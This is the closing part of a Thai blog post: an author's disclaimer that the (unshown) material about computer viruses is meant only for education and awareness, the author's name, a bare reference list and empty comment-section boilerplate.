ผมมีจุดประสงค์เพื่อการศึกษาและให้ผู้ใช้อินเตอร์เน็ตรู้เท่าทันเท่านั้น อย่าได้คิดนำไปสร้างเพื่อทำร้ายหรือแกล้งใครเพราะปัจจุบันนี้มีไวรัสมากมายพอแล้วในโลกอินเตอร์เน็ต

กังวาล  ทองเนตร


อ้างอิงจาก  >>> [ ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] 6 ] 7 ] 8 ] 9 ]
           


ไม่มีความคิดเห็น:

แสดงความคิดเห็น

หมายเหตุ: มีเพียงสมาชิกของบล็อกนี้เท่านั้นที่สามารถแสดงความคิดเห็น